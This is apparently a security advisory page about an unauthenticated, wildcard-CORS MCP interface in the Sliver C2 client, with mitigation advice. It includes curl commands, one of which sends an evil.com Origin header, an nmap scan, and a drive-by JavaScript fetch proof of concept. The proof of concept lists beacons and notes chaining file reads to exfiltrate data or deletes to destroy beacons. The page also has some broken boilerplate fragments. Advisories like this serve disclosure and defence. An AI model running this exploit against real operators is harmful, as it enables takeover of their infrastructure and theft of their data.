Sliver C2, MCP Interface Unauthenticated CSRF/CORS Vulnerability (Critical)

Listen to this Post

The vulnerability exists because the Sliver MCP server, which runs inside the Sliver client, binds an unauthenticated HTTP and SSE interface to `localhost:8080` by default and returns `Access-Control-Allow-Origin: ` on all responses. This permissive CORS header allows any arbitrary website to issue cross-origin requests to the interface through an operator’s browser, with no credentials or preflight required. The issue is exacerbated because the underlying `mcp-go` library hardcodes the wildcard CORS header and fails to validate Content-Type, allowing simple requests (e.g., text/plain) to bypass the OPTIONS preflight entirely. An attacker can therefore lure an operator to a malicious page that executes JavaScript silently interacting with the local MCP API. The exposed methods include list_sessions_and_beacons, filesystem operations (fs_ls, fs_cat, fs_rm, etc.), giving full control over active beacons and sessions. If the interface is misconfigured to bind to 0.0.0.0, the attack escalates to direct unauthenticated remote access from any network actor. No authentication middleware or origin restrictions are implemented in Sliver, making the RPC endpoint completely unprotected. A single click can lead to total operational compromise: data exfiltration, campaign destruction, or infrastructure takeover.

DailyCVE Form

Platform: Sliver C2
Version: All MCP-enabled
Vulnerability: Unauthenticated MCP Interface
Severity: Critical
Date: 2026-03-31

Prediction: April 2026 estimated

What Undercode Say:

Analytics from the

Check if MCP interface is exposed on localhost
curl -H "Origin: http://evil.com" http://localhost:8080/mcp
List active beacons (simple request example)
curl -X POST http://localhost:8080/mcp \
-H "Content-Type: text/plain" \
-d '{"jsonrpc":"2.0","method":"tools/call","params":{"name":"list_sessions_and_beacons"}}'
For 0.0.0.0 misconfiguration, scan network for port 8080
nmap -p 8080 <target-C2-IP> --open

Exploit:

Attacker-controlled JavaScript (drive-by):

// Executes without preflight due to text/plain
fetch('http://localhost:8080/mcp', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: JSON.stringify({
jsonrpc: '2.0',
method: 'tools/call',
params: { name: 'list_sessions_and_beacons' }
})
}).then(r => r.json()).then(console.log);
// Then chain fs_cat to exfiltrate data or fs_rm to destroy beacons

Protection from this CVE

  • Bind only to loopback and restrict with firewall rules.
  • Never bind to `0.0.0.0` for this interface.
  • Apply vendor patch when available; until then, disable MCP server if not needed.
  • Use browser isolation or strict network policies for operator workstations.
  • Implement authentication proxy in front of the MCP endpoint.

Impact

Total operational compromise:

  • Complete visibility into active beacons and sessions.
  • Arbitrary file read (SSH keys, ntds.dit) via existing C2 channels.
  • Integrity loss: delete or modify files on compromised targets.
  • If bound to 0.0.0.0, direct remote takeover of the entire C2 infrastructure without operator interaction.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top